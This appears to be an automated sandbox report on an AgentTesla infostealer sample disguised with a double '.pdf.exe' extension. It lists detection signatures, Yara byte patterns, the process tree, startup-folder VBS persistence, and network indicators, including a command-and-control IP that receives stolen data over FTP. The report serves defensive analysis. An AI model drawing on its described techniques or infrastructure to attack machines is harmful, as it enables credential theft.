
Windows Analysis Report
INDIA - VSL PARTICULARS.pdf.exe

Overview

General Information

Sample name:INDIA - VSL PARTICULARS.pdf.exe
Analysis ID:1519011
MD5:6f780b2d3c14a3c9bb7c99c818421ea1
SHA1:a125c2a8cd2f4d4fbda4429bdae54e85eec396a2
SHA256:c7183b75ac8f638031abbb6bb3edd5223c626483d5cc82e6b30ae049de038a00
Tags:exeuser-threatcat_ch

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • INDIA - VSL PARTICULARS.pdf.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
    • name.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
      • RegSvcs.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6040 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • name.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
      • RegSvcs.exe (PID: 2020 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • name.exe (PID: 5196 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
        • RegSvcs.exe (PID: 5172 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • name.exe (PID: 2872 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6F780B2D3C14A3C9BB7C99C818421EA1)
          • RegSvcs.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | -
    Source | Rule | Description | Author | Strings
    00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    Source | Rule | Description | Author | Strings
    8.2.name.exe.1690000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    2.2.name.exe.2b70000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.
    6.2.name.exe.37b0000.1.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen | strings:
    • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x700:$s3: 83 EC 38 53 B0 B1 88 44 24 2B 88 44 24 2F B0 ED 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1e9d0:$s5: delete[]
    • 0x1de88:$s6: constructor or from DllMain.

    System Summary

    Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe", CommandLine: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, NewProcessName: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, OriginalFileName: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe", ProcessId: 5932, ProcessName: INDIA - VSL PARTICULARS.pdf.exe
    Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6040, ProcessName: wscript.exe
    Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 6040, ProcessName: wscript.exe

    Data Obfuscation

    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 5392, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-09-26T05:34:32.803495+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.6 | 49719 | 50.87.144.157 | 21 | TCP

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-09-26T05:34:33.314890+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.6 | 49720 | 50.87.144.157 | 35284 | TCP
    2024-09-26T05:34:33.321440+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.6 | 49720 | 50.87.144.157 | 35284 | TCP


    AV Detection

    Source: INDIA - VSL PARTICULARS.pdf.exe | Avira: detected
    Source: C:\Users\user\AppData\Local\directory\name.exe | Avira: detection malicious, Label: HEUR/AGEN.1321671
    Source: C:\Users\user\AppData\Local\directory\name.exe | ReversingLabs: Detection: 34%
    Source: INDIA - VSL PARTICULARS.pdf.exe | Virustotal: Detection: 27%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\directory\name.exe | Joe Sandbox ML: detected
    Source: INDIA - VSL PARTICULARS.pdf.exe | Joe Sandbox ML: detected
    Source: INDIA - VSL PARTICULARS.pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49712 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: name.exe, 00000002.00000003.2227032386.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2226523260.0000000004630000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364292019.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000003.2364812639.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400599794.0000000004770000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.2400477243.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437273788.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000A.00000003.2437000845.0000000004760000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045DE8F FindFirstFileW,FindClose
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose
    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
    Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\

    Networking

    Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49720 -> 50.87.144.157:35284
    Source: Network traffic | Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49719 -> 50.87.144.157:21
    Source: global traffic | TCP traffic: 192.168.2.6:49720 -> 50.87.144.157:35284
    Source: Joe Sandbox View | IP Address: 104.26.12.205
    Source: Joe Sandbox View | IP Address: 104.26.12.205
    Source: Joe Sandbox View | IP Address: 50.87.144.157
    Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknown | DNS query: name: api.ipify.org
    Source: unknown | DNS query: name: api.ipify.org
    Source: unknown | FTP traffic detected: 50.87.144.157:21 -> 192.168.2.6:49719 | Server banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- | 220-You are user number 2 of 150 allowed. | 220-Local time is now 22:34. Server port: 21. | 220-IPv6 connections are also welcome on this server. | 220 You will be disconnected after 15 minutes of inactivity.
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
    Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
    Source: global traffic | DNS traffic detected: DNS query: beirutrest.com
    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49712 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.6:49718 version: TLS 1.2
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
    Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

    System Summary

    Source: 8.2.name.exe.1690000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
    Source: 2.2.name.exe.2b70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
    Source: 6.2.name.exe.37b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
    Source: 00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
    Source: 00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
    Source: 00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
    Source: initial sample | Static PE information: Filename: INDIA - VSL PARTICULARS.pdf.exe
